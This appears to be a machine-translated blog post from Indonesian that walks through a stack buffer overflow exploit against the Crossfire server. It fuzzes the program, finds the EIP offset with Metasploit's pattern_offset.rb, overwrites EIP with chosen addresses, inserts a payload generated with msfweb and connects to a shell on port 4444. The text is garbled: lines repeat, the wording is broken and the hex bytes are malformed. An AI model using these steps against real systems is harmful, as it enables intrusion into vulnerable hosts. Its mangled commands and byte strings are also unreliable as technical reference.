root @ bt: ~ / crossfire / bin #. / crossfire
CrossFire software that we use the fuzzer attack was apparently crashes, then what we do next is to change the fuzzer again to look at the program EIPnya crossfire.
after fuzzer diruba using 4379 as the data byte and run more software crossfire mengunkan consul and observe what happens
and it can change the contents inside and ruba fuzzer is a much bite karater 4379 with the command consul.
crash = "\ X41" * 4379 -- 4 menjadi [4395]
+ crash = "\ XeF \ xBE \ XAD \ xDE"
run the fuzzer and then Kelik run the applications that are running earlier.
add crash + = "\ X41" * 3 pda fuzzer and do it again by running the program was run until it changes its EIP.
checking a lot of data to the consul:
root @ bt :/ opt/framework/msf3/tools #. / pattern_offset.rb 46,367,046
root @ bt :/ opt/framework/msf3/tools #. / pattern_offset.rb 46,367,046
checking a lot of data to the consul:
root @ bt :/ opt/framework/msf3/tools #. / pattern_offset.rb 46,367,046
turns on the 4368 data as there patten_offsetnya means the data we created in 4379 as one of the first fuzzer it too much. should be reduced first and then do the check again using the consul.
root @ bt :/ opt/framework/msf3/tools #. / pattern_offset.rb 46,367,046
turns on the 4368 data as there patten_offsetnya means the data we created in 4379 as one of the first fuzzer it too much. should be reduced first and then do the check again using the consul.
to ensure test it using the command: crash + = "\ X90 \ X90 \ X90 \ X90"
then we can ensure that we find the EIP will change and go a long overwrite EIP.
then we can ensure that we find the EIP will change and go a long overwrite EIP.
do a test by typing commands on the consul
root @ bt: ~ / crossfire / bin # gdb crossfire
root @ bt: ~ / crossfire / bin # gdb crossfire
of the process: typing run and info registers
seen in the above gampar EIP was changed to 0x90909090
then entered into the fox was again fuzzer (EAX 0xb7da3a0e) by filling in and flipped fuzzernya something like the following.
crash + = "\ X0E \ 3A \ DA \ B7"
and insert EIP (eip 0xb7da3a1f 0xb7da3a1f)
and insert that has turned into eip: crash + = "\ x1E \ x3A \ xda \ xB7"
and insert that has turned into eip: crash + = "\ x1E \ x3A \ xda \ xB7"
"Payload"
next run on the console, run the ./msfweb.
when it's over we find and install new payload for pairs later in the fuzzer. rare look inside our first consul and type the command: root @ bt :/ pentest/exploits/framework2 #. / msfweb
rom there later will come that will bring the address URLs Payload later.
payload copied all obtained in the browser
payload copied all acquired within the browser into a fuzzer and that she was put into the payload and test fuzzer using telnet 127.0.0.1 4444.
....Finish...
Alhamdullah hirobbilalamin.
Tidak ada komentar:
Posting Komentar